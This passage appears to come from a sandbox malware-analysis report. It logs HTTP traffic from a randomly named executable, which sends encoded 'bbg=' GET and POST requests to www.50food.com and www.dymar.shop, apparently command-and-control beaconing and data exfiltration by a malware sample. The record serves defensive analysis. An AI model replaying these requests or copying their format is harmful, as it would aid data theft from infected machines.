                                                                                      Jan 10, 2025 19:54:17.877803087 CET521OUTGET /29r3/?bbg=3G351C0lqnMT5KSEhB6QkRv7ej9rv2/VXMsOqSS+pJvTAxAcXzEXZLJlfm59V9XHiWzt79CRV1JOIFYnv3Wo76qcp/vE/TTTBmL93e2sLUBUnoZ9o80wo25/oxpiL6JXtg==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:18.487580061 CET141INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:14 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      38192.168.2.550036185.68.16.160804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:23.639585972 CET771OUTPOST /p9ll/ HTTP/1.1
                                                                                      Host: www.dymar.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.dymar.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.dymar.shop/p9ll/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 38 70 4b 38 72 36 49 36 46 56 4c 4c 2b 66 61 64 61 68 56 53 36 79 49 4c 6c 35 75 7a 47 52 77 35 38 5a 79 65 47 5a 71 48 30 53 38 33 4b 64 42 52 4f 38 41 53 72 46 56 48 35 67 4f 4a 58 62 42 6b 41 4d 4f 4a 70 63 36 6c 61 6d 4f 73 78 6a 2b 38 67 45 74 66 2f 73 42 33 41 79 57 75 66 68 72 55 2f 2f 6e 6e 57 59 7a 4b 42 7a 4c 55 63 58 42 73 54 75 54 6d 32 53 30 35 35 4c 2b 72 66 34 4f 34 37 73 50 32 48 67 4e 46 6b 43 67 36 4c 49 35 47 51 31 47 67 74 4d 74 47 78 36 6b 5a 73 49 57 49 6f 64 78 30 4e 4f 4a 53 52 48 4f 32 71 42 61 48 43 76 74 6d 70 30 72 62 66 48 75 62 75 69 46 52 69 6e 38 62 33 4e 30 3d
                                                                                      Data Ascii: bbg=8pK8r6I6FVLL+fadahVS6yILl5uzGRw58ZyeGZqH0S83KdBRO8ASrFVH5gOJXbBkAMOJpc6lamOsxj+8gEtf/sB3AyWufhrU//nnWYzKBzLUcXBsTuTm2S055L+rf4O47sP2HgNFkCg6LI5GQ1GgtMtGx6kZsIWIodx0NOJSRHO2qBaHCvtmp0rbfHubuiFRin8b3N0=
                                                                                      Jan 10, 2025 19:54:24.475491047 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:24 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: OCSESSID=7cc91b54a734037afb07d620d6; path=/
                                                                                      Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:24 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:24 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      x-ray: wnp32698:0.120/wn32698:0.120/wa32698:D=118049
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 31 30 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 1c db 6e 1b c7 f5 5d 40 ff 61 bc 68 63 09 d5 8a 94 28 db 92 4d 32 48 6d 37 b5 11 27 8d 1d 07 b9 20 08 86 bb 43 72 ec bd 65 2f 92 d8 a6 80 e4 a4 4d 02 07 55 92 06 48 90 a6 8d 83 f4 b1 05 14 d9 8e 15 5d e8 87 fe c0 f2 17 fa 25 3d 67 66 77 b9 bb 5c de 2c c5 08 03 8b b3 3b 33 e7 7e ce 9c 39 33 4c f5 d4 a5 97 2e be f2 fa ef 2f 93 b6 6f 1a f5 99 ea 29 55 7d 93 37 c9 95 cb 6f d5 ab a7 de 64 96 ce 9b 6f a9 6a ba 83 ac 10 e8 c3 e1 44 e7 6e 4d 31 7c 57 21 06 b5 5a 35 c5 0d 14 a2 19 d4 f3 6a 0a 67 2b ca 50 08 ab 93 41 58 1d 02 61 b6 e5 0b 28 73 ef 9e 9a bd 72 79 0e 29 15 dd c3 20 ca 99 59 50 6d 46 f5 fa 0c 21 55 83 5b b7 89 cb 8c 9a a2 51 cb b6 b8 46 0d 85 b4 5d d6 ac 29 6d df 77 bc f3 a5 d2 fa fa fa 82 de 31 a9 bb e0 b5 6d 47 21 a5 3a 21 33 55 93 f9 94 68 6d ea 7a cc af 29 37 5f f9 ad ba 82 5d 51 87 45 4d 56 53 d6 38 5b 77 6c d7 07 a6 6c cb 67 16 0c 5c e7 ba df ae e9 6c 8d 6b 4c 15 0f f3 84 5b dc e7 d4 50 3d 40 ce 6a 8b 4a 0c 04 09 50 d9 3b 01 5f ab 29 af a9 [TRUNCATED]
                                                                                      Data Ascii: 1023n]@ahc(M2Hm7' Cre/MUH]%=gfw\,;3~93L./o)U}7odojDnM1|W!Z5jg+PAXa(sry) YPmF!U[QF])mw1mG!:!3Uhmz)7_]QEMVS8[wllg\lkL[P=@jJP;_)7S/C}0X5ozE>m;pMz[;{;NcAT$Tc#Q,!qaJz]r/5l|:%O&"uym@d&9W51&EM&P_wP60fl RbY%A6MjrSu/WQ24q'dKJx6\Ew_-q+oDROH'R&mEx;V+R>JqC!-0z1G "azK1J&+!z
                                                                                      Jan 10, 2025 19:54:24.475517035 CET1236INData Raw: ed 79 b5 fc ea ca d9 6b 2f 5e 7d f9 b5 8b 29 0e 12 b8 d0 22 64 9d 5b ba 0d d4 03 b1 2f d0 0e 73 49 6d f0 d5 bb ef 92 37 df ba 80 a3 9b 81 a5 f9 dc b6 08 a2 99 9d fb 63 32 66 c1 09 bc f6 2c 75 5b 81 09 81 c7 9b bb f0 27 1c 2e 46 9d be e5 9d 9e 27
                                                                                      Data Ascii: yk/^})"d[/sIm7c2f,u['.F'['fRD-p:Miyvwj:/P*7)^Fg*K,6>vJ.~Z*/)oX"R`m[mP%yfcFrP\:[E(TK8B
                                                                                      Jan 10, 2025 19:54:24.475529909 CET1236INData Raw: cb b8 81 eb 6d 61 ed 06 02 0d d8 27 ba 84 b4 d1 bd 6a 49 8e cd a8 2f 3b 7d 51 21 f5 f0 3f b0 fc 08 1f 82 ec f9 01 84 87 4d 02 5f 07 bd 6d 02 80 ee 84 3f 00 a8 43 2c 10 3d c2 08 82 83 00 dd 4e 16 f6 80 c0 73 68 96 10 cd b7 b8 c3 04 50 0f 61 fe 7e
                                                                                      Data Ascii: ma'jI/;}Q!?M_m?C,=NshPa~G@0P .|{EiDtQ 0Ncq@}A!Q3{$*d(on=:@!"d:Q}ym#%ZJ"Q.Pq0t(02=\!
                                                                                      Jan 10, 2025 19:54:24.475541115 CET660INData Raw: 3c 83 5a 47 93 75 90 8c 06 6d 49 fe 07 1c 54 2a 36 66 3f 01 ad d4 cb 69 b5 a5 8f 8f f3 d4 88 a0 31 48 4a 16 ae 8c 2c 23 42 2c 20 ec 5f 4e 1b c4 9b 3e ef 4e 9d 32 0a d8 89 d4 fa 0b 6c f6 f4 31 7d a9 30 b1 98 d4 ed 80 aa 93 58 0c da 85 c6 2c 79 80
                                                                                      Data Ascii: <ZGumIT*6f?i1HJ,#B, _N>N2l1}0X,yv#`=?U-91uNG2NjLQ}9~`BT}@TyOFx1&0hym:`xB.NiFgxu&qPqIl_;pAd'8yg
                                                                                      Jan 10, 2025 19:54:24.475562096 CET304INData Raw: d1 92 f7 04 22 d2 4e 5e cf 6b 76 a0 b5 25 4a 81 48 54 58 93 22 9f 28 20 6f 8a 12 ef fb 32 26 e0 e1 e9 89 d1 d0 6c 72 83 53 9f 25 b7 d3 be 09 e3 b3 a6 4f e1 7b 4b 20 dc 26 62 e5 ed 8a c4 1b 6d fd f0 e4 cc 2e 96 be e7 30 8d 63 51 21 fc 24 dc c7 c8
                                                                                      Data Ascii: "N^kv%JHTX"( o2&lrS%O{K &bm.0cQ!$[$cO<Gt2q.LKYmy{8@1Yl3_.xC*"ZmWWM8?SC.][3=O7+rs(7!)TgQw|Y!iU#s


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      39192.168.2.550037185.68.16.160804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:26.190392017 CET791OUTPOST /p9ll/ HTTP/1.1
                                                                                      Host: www.dymar.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.dymar.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.dymar.shop/p9ll/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 38 70 4b 38 72 36 49 36 46 56 4c 4c 34 37 65 64 5a 43 39 53 38 53 49 49 70 5a 75 7a 66 42 78 77 38 5a 75 65 47 62 62 66 7a 67 59 33 4b 35 46 52 4e 2b 6f 53 6f 46 56 48 32 77 4f 47 4b 4c 42 76 41 4d 53 33 70 65 75 6c 61 69 6d 73 78 69 4f 38 67 33 31 63 38 63 42 69 55 43 57 6f 62 68 72 55 2f 2f 6e 6e 57 59 6d 74 42 33 66 55 66 6c 56 73 53 50 54 6c 37 79 30 6d 77 72 2b 72 62 34 4f 38 37 73 50 45 48 6b 55 65 6b 47 51 36 4c 4d 70 47 51 67 71 76 6a 4d 74 45 2b 61 6c 72 38 34 6e 39 6e 4f 4e 6b 41 38 64 50 4c 6b 32 32 6d 58 72 74 59 4e 6c 4f 36 55 48 6a 50 55 6d 73 2f 53 6b 34 34 45 73 72 70 61 6a 37 79 6f 47 55 6a 62 71 31 44 79 56 62 4b 63 5a 59 36 6c 62 37
                                                                                      Data Ascii: bbg=8pK8r6I6FVLL47edZC9S8SIIpZuzfBxw8ZueGbbfzgY3K5FRN+oSoFVH2wOGKLBvAMS3peulaimsxiO8g31c8cBiUCWobhrU//nnWYmtB3fUflVsSPTl7y0mwr+rb4O87sPEHkUekGQ6LMpGQgqvjMtE+alr84n9nONkA8dPLk22mXrtYNlO6UHjPUms/Sk44Esrpaj7yoGUjbq1DyVbKcZY6lb7
                                                                                      Jan 10, 2025 19:54:27.008007050 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:26 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: OCSESSID=53be1d3a674e5327abd56ef2cf; path=/
                                                                                      Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:26 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:26 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      x-ray: wnp32698:0.110/wn32698:0.110/wa32698:D=109573
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 31 30 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 1c db 6e 1b c7 f5 5d 40 ff 61 bc 68 63 09 d5 8a 94 28 db 92 4d 32 48 6d 37 b5 11 27 8d 1d 07 b9 20 08 86 bb 43 72 ec bd 65 2f 92 d8 a6 80 e4 a4 4d 02 07 55 92 06 48 90 a6 8d 83 f4 b1 05 14 d9 8e 15 5d e8 87 fe c0 f2 17 fa 25 3d 67 66 77 b9 bb 5c de 2c c5 08 03 8b b3 3b 33 e7 7e ce 9c 39 33 4c f5 d4 a5 97 2e be f2 fa ef 2f 93 b6 6f 1a f5 99 ea 29 55 7d 93 37 c9 95 cb 6f d5 ab a7 de 64 96 ce 9b 6f a9 6a ba 83 ac 10 e8 c3 e1 44 e7 6e 4d 31 7c 57 21 06 b5 5a 35 c5 0d 14 a2 19 d4 f3 6a 0a 67 2b ca 50 08 ab 93 41 58 1d 02 61 b6 e5 0b 28 73 ef 9e 9a bd 72 79 0e 29 15 dd c3 20 ca 99 59 50 6d 46 f5 fa 0c 21 55 83 5b b7 89 cb 8c 9a a2 51 cb b6 b8 46 0d 85 b4 5d d6 ac 29 6d df 77 bc f3 a5 d2 fa fa fa 82 de 31 a9 bb e0 b5 6d 47 21 a5 3a 21 33 55 93 f9 94 68 6d ea 7a cc af 29 37 5f f9 ad ba 82 5d 51 87 45 4d 56 53 d6 38 5b 77 6c d7 07 a6 6c cb 67 16 0c 5c e7 ba df ae e9 6c 8d 6b 4c 15 0f f3 84 5b dc e7 d4 50 3d 40 ce 6a 8b 4a 0c 04 09 50 d9 3b 01 5f ab 29 af a9 [TRUNCATED]
                                                                                      Data Ascii: 1023n]@ahc(M2Hm7' Cre/MUH]%=gfw\,;3~93L./o)U}7odojDnM1|W!Z5jg+PAXa(sry) YPmF!U[QF])mw1mG!:!3Uhmz)7_]QEMVS8[wllg\lkL[P=@jJP;_)7S/C}0X5ozE>m;pMz[;{;NcAT$Tc#Q,!qaJz]r/5l|:%O&"uym@d&9W51&EM&P_wP60fl RbY%A6MjrSu/WQ24q'dKJx6\Ew_-q+oDROH'R&mEx;V+R>JqC!-0z1G "azK1J&+!z
                                                                                      Jan 10, 2025 19:54:27.008025885 CET1236INData Raw: ed 79 b5 fc ea ca d9 6b 2f 5e 7d f9 b5 8b 29 0e 12 b8 d0 22 64 9d 5b ba 0d d4 03 b1 2f d0 0e 73 49 6d f0 d5 bb ef 92 37 df ba 80 a3 9b 81 a5 f9 dc b6 08 a2 99 9d fb 63 32 66 c1 09 bc f6 2c 75 5b 81 09 81 c7 9b bb f0 27 1c 2e 46 9d be e5 9d 9e 27
                                                                                      Data Ascii: yk/^})"d[/sIm7c2f,u['.F'['fRD-p:Miyvwj:/P*7)^Fg*K,6>vJ.~Z*/)oX"R`m[mP%yfcFrP\:[E(TK8B
                                                                                      Jan 10, 2025 19:54:27.008038044 CET448INData Raw: cb b8 81 eb 6d 61 ed 06 02 0d d8 27 ba 84 b4 d1 bd 6a 49 8e cd a8 2f 3b 7d 51 21 f5 f0 3f b0 fc 08 1f 82 ec f9 01 84 87 4d 02 5f 07 bd 6d 02 80 ee 84 3f 00 a8 43 2c 10 3d c2 08 82 83 00 dd 4e 16 f6 80 c0 73 68 96 10 cd b7 b8 c3 04 50 0f 61 fe 7e
                                                                                      Data Ascii: ma'jI/;}Q!?M_m?C,=NshPa~G@0P .|{EiDtQ 0Ncq@}A!Q3{$*d(on=:@!"d:Q}ym#%ZJ"Q.Pq0t(02=\!
                                                                                      Jan 10, 2025 19:54:27.008049965 CET1236INData Raw: 31 09 29 d3 10 12 7f f2 04 9d 95 f6 18 99 9f a0 e7 f1 04 11 b2 08 d4 b9 0c 6f df 44 a6 8b d1 f1 61 ca c2 87 a1 48 7f c6 8a 71 25 2b c6 28 b2 25 ab db 71 d1 c5 9f 3c 5a 11 6a be ce ad 74 4f 20 aa a5 72 86 fe 7b a0 e4 07 10 12 76 a2 e5 ad ab f6 fe
                                                                                      Data Ascii: 1)oDaHq%+(%q<ZjtO r{v,VKV~<jMr4>>w2,Kqz&:fDsq"ZB;DVDX'Y.BXZ*C{6k~J=7Aq27lD8rd%
                                                                                      Jan 10, 2025 19:54:27.008063078 CET516INData Raw: 36 b8 cf 6f 53 b5 c1 fe 60 3b d4 b3 80 06 8e 26 22 8c 03 cf 31 f7 44 c1 29 fc 1e ec f7 51 d8 8d 0e b9 8f 22 3a f6 8e 4f 41 e0 19 f6 1a 0a c0 b3 5b a0 ae 36 b3 e0 01 28 f8 0e d0 c8 d3 d1 f8 68 26 bc 8f 59 36 1e 5e 0b 0f 1b 79 57 25 1b a3 73 a9 d7
                                                                                      Data Ascii: 6oS`;&"1D)Q":OA[6(h&Y6^yW%sdmx=mx%S$hp]Pz`JuVH1wWHt*NmcIyK=%@<)8T{~}Jf&&9pER'5^"N^kv%JHTX"( o2&


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      40192.168.2.550038185.68.16.160804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:28.733746052 CET1808OUTPOST /p9ll/ HTTP/1.1
                                                                                      Host: www.dymar.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.dymar.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.dymar.shop/p9ll/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 38 70 4b 38 72 36 49 36 46 56 4c 4c 34 37 65 64 5a 43 39 53 38 53 49 49 70 5a 75 7a 66 42 78 77 38 5a 75 65 47 62 62 66 7a 67 51 33 4b 4d 52 52 4f 5a 30 53 70 46 56 48 77 41 4f 46 4b 4c 42 75 41 4d 62 77 70 65 69 31 61 67 65 73 77 41 32 38 33 79 42 63 72 73 42 69 4c 53 57 70 66 68 72 42 2f 2f 58 72 57 59 32 74 42 33 66 55 66 6b 6c 73 45 75 54 6c 6f 43 30 35 35 4c 2b 6e 66 34 4f 45 37 73 6e 55 48 6b 5a 72 6e 33 73 36 4c 74 46 47 52 57 2b 76 76 4d 74 43 2f 61 6c 7a 38 34 72 55 6e 4f 52 6f 41 39 6f 48 4c 6b 4f 32 69 6a 71 36 4c 63 4e 6e 6d 58 48 64 44 47 50 50 69 48 41 38 39 69 51 67 6a 61 76 47 2f 72 43 32 6b 72 4f 32 48 41 4a 53 58 70 68 65 38 56 72 76 7a 59 54 52 36 66 36 54 47 2f 61 38 30 44 49 77 75 6a 43 4d 32 4b 6c 49 4a 55 53 4e 32 4b 71 7a 34 55 6a 42 46 35 79 39 79 52 6b 56 52 56 77 74 33 71 31 75 57 58 54 65 4b 48 76 7a 71 70 6a 7a 76 36 65 44 39 35 50 65 7a 34 53 6b 6a 68 4d 54 61 56 66 4f 36 6f 61 58 41 62 57 37 47 75 67 55 6c 2f 78 32 37 58 51 47 6b 39 36 4b 38 6d 49 2f 6e 2b [TRUNCATED]
                                                                                      Data Ascii: bbg=8pK8r6I6FVLL47edZC9S8SIIpZuzfBxw8ZueGbbfzgQ3KMRROZ0SpFVHwAOFKLBuAMbwpei1ageswA283yBcrsBiLSWpfhrB//XrWY2tB3fUfklsEuTloC055L+nf4OE7snUHkZrn3s6LtFGRW+vvMtC/alz84rUnORoA9oHLkO2ijq6LcNnmXHdDGPPiHA89iQgjavG/rC2krO2HAJSXphe8VrvzYTR6f6TG/a80DIwujCM2KlIJUSN2Kqz4UjBF5y9yRkVRVwt3q1uWXTeKHvzqpjzv6eD95Pez4SkjhMTaVfO6oaXAbW7GugUl/x27XQGk96K8mI/n+wHgWwYhwz6dV40GwJGB6jIKQIGpGIsrF2hD6iIETCNFPMrhA8JU3QgqI7ahyZD/HyVz1CeK9JjJDHa0kCe6rjTpeGpW90KRyG9tog0WDdwVHtCNC41rvNPxtdVFpxpLhwh40EhOcFZ0jz/8o60QuCl548Fcf//OkYxPLPYzy+NIOyE0DCqsp5NBoM4iFNIjnFyI+831uSMyZoShluELakJKsHrPJ6/eWf8ZBlXVdmmfKPT2WUW7D/dpHSlF6WhZsj9GUUDkkHqunbYE1HaHtuqVO1K9CpgTrIL4gf671GfgofZTNG5m5JhVFknltMkIAYeBTJa0FXpxtRKW+gB8EMZBqKUpgzfeoqeOD8KykkMMDl7A4RFEST+lEdIk40MvLpL8+3kFFidw/62UOX4HXLfac5DHDreItBdimQ1awpTPLsxYGnD2vG+qX2fNraHIk0xy+viOBvwO+O5aDye5cH5Ypr5y5vXWc+UJaYngxn6ujf7Ii+QcWpa88W0ewt+Hafvatt2GWMMDoXk1WGkc+vb0eDBPIda7ILi/A3Clkq+ZXuT8s7xsaQYKjNPvCS7uHVSS7WVwP/TzhIaLVj0MKntYGn7FaR9Mm5Shz7Im3oaTTt7objrSdwcsyfEnHCGvideHZRZ/aXPxx/rDxSTdsjOF0ExG4BXZ3W9 [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:29.535018921 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:29 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: OCSESSID=4ccdd6c1675039079c9354df9d; path=/
                                                                                      Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:29 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:29 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      x-ray: wnp32698:0.110/wn32698:0.110/wa32698:D=112835
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 31 30 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 1c db 6e 1b c7 f5 5d 40 ff 61 bc 68 63 09 d5 8a 94 28 db 92 4d 32 48 6d 37 b5 11 27 8d 1d 07 b9 20 08 86 bb 43 72 ec bd 65 2f 92 d8 a6 80 e4 a4 4d 02 07 55 92 06 48 90 a6 8d 83 f4 b1 05 14 d9 8e 15 5d e8 87 fe c0 f2 17 fa 25 3d 67 66 77 b9 bb 5c de 2c c5 08 03 8b b3 3b 33 e7 7e ce 9c 39 33 4c f5 d4 a5 97 2e be f2 fa ef 2f 93 b6 6f 1a f5 99 ea 29 55 7d 93 37 c9 95 cb 6f d5 ab a7 de 64 96 ce 9b 6f a9 6a ba 83 ac 10 e8 c3 e1 44 e7 6e 4d 31 7c 57 21 06 b5 5a 35 c5 0d 14 a2 19 d4 f3 6a 0a 67 2b ca 50 08 ab 93 41 58 1d 02 61 b6 e5 0b 28 73 ef 9e 9a bd 72 79 0e 29 15 dd c3 20 ca 99 59 50 6d 46 f5 fa 0c 21 55 83 5b b7 89 cb 8c 9a a2 51 cb b6 b8 46 0d 85 b4 5d d6 ac 29 6d df 77 bc f3 a5 d2 fa fa fa 82 de 31 a9 bb e0 b5 6d 47 21 a5 3a 21 33 55 93 f9 94 68 6d ea 7a cc af 29 37 5f f9 ad ba 82 5d 51 87 45 4d 56 53 d6 38 5b 77 6c d7 07 a6 6c cb 67 16 0c 5c e7 ba df ae e9 6c 8d 6b 4c 15 0f f3 84 5b dc e7 d4 50 3d 40 ce 6a 8b 4a 0c 04 09 50 d9 3b 01 5f ab 29 af a9 [TRUNCATED]
                                                                                      Data Ascii: 1023n]@ahc(M2Hm7' Cre/MUH]%=gfw\,;3~93L./o)U}7odojDnM1|W!Z5jg+PAXa(sry) YPmF!U[QF])mw1mG!:!3Uhmz)7_]QEMVS8[wllg\lkL[P=@jJP;_)7S/C}0X5ozE>m;pMz[;{;NcAT$Tc#Q,!qaJz]r/5l|:%O&"uym@d&9W51&EM&P_wP60fl RbY%A6MjrSu/WQ24q'dKJx6\Ew_-q+oDROH'R&mEx;V+R>JqC!-0z1G "azK1J&+!z
                                                                                      Jan 10, 2025 19:54:29.535072088 CET1236INData Raw: ed 79 b5 fc ea ca d9 6b 2f 5e 7d f9 b5 8b 29 0e 12 b8 d0 22 64 9d 5b ba 0d d4 03 b1 2f d0 0e 73 49 6d f0 d5 bb ef 92 37 df ba 80 a3 9b 81 a5 f9 dc b6 08 a2 99 9d fb 63 32 66 c1 09 bc f6 2c 75 5b 81 09 81 c7 9b bb f0 27 1c 2e 46 9d be e5 9d 9e 27
                                                                                      Data Ascii: yk/^})"d[/sIm7c2f,u['.F'['fRD-p:Miyvwj:/P*7)^Fg*K,6>vJ.~Z*/)oX"R`m[mP%yfcFrP\:[E(TK8B
                                                                                      Jan 10, 2025 19:54:29.535115957 CET448INData Raw: cb b8 81 eb 6d 61 ed 06 02 0d d8 27 ba 84 b4 d1 bd 6a 49 8e cd a8 2f 3b 7d 51 21 f5 f0 3f b0 fc 08 1f 82 ec f9 01 84 87 4d 02 5f 07 bd 6d 02 80 ee 84 3f 00 a8 43 2c 10 3d c2 08 82 83 00 dd 4e 16 f6 80 c0 73 68 96 10 cd b7 b8 c3 04 50 0f 61 fe 7e
                                                                                      Data Ascii: ma'jI/;}Q!?M_m?C,=NshPa~G@0P .|{EiDtQ 0Ncq@}A!Q3{$*d(on=:@!"d:Q}ym#%ZJ"Q.Pq0t(02=\!
                                                                                      Jan 10, 2025 19:54:29.535150051 CET1236INData Raw: 31 09 29 d3 10 12 7f f2 04 9d 95 f6 18 99 9f a0 e7 f1 04 11 b2 08 d4 b9 0c 6f df 44 a6 8b d1 f1 61 ca c2 87 a1 48 7f c6 8a 71 25 2b c6 28 b2 25 ab db 71 d1 c5 9f 3c 5a 11 6a be ce ad 74 4f 20 aa a5 72 86 fe 7b a0 e4 07 10 12 76 a2 e5 ad ab f6 fe
                                                                                      Data Ascii: 1)oDaHq%+(%q<ZjtO r{v,VKV~<jMr4>>w2,Kqz&:fDsq"ZB;DVDX'Y.BXZ*C{6k~J=7Aq27lD8rd%
                                                                                      Jan 10, 2025 19:54:29.535187960 CET516INData Raw: 36 b8 cf 6f 53 b5 c1 fe 60 3b d4 b3 80 06 8e 26 22 8c 03 cf 31 f7 44 c1 29 fc 1e ec f7 51 d8 8d 0e b9 8f 22 3a f6 8e 4f 41 e0 19 f6 1a 0a c0 b3 5b a0 ae 36 b3 e0 01 28 f8 0e d0 c8 d3 d1 f8 68 26 bc 8f 59 36 1e 5e 0b 0f 1b 79 57 25 1b a3 73 a9 d7
                                                                                      Data Ascii: 6oS`;&"1D)Q":OA[6(h&Y6^yW%sdmx=mx%S$hp]Pz`JuVH1wWHt*NmcIyK=%@<)8T{~}Jf&&9pER'5^"N^kv%JHTX"( o2&


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.550039185.68.16.160804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:31.325951099 CET521OUTGET /p9ll/?bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G1+CjUa2j1QQaHO4mbNQdsyhC9y7mIsh8JvmYw8eVSH73nhuf0Xl7ku83LF6dLivHkvOUWe3dGgjTeU1FcMTS2wwr3KqFBZ3Pmw==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.dymar.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:32.152220964 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:32 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: OCSESSID=09d5d2ba5f77960f0f6a6c4e21; path=/
                                                                                      Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:31 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
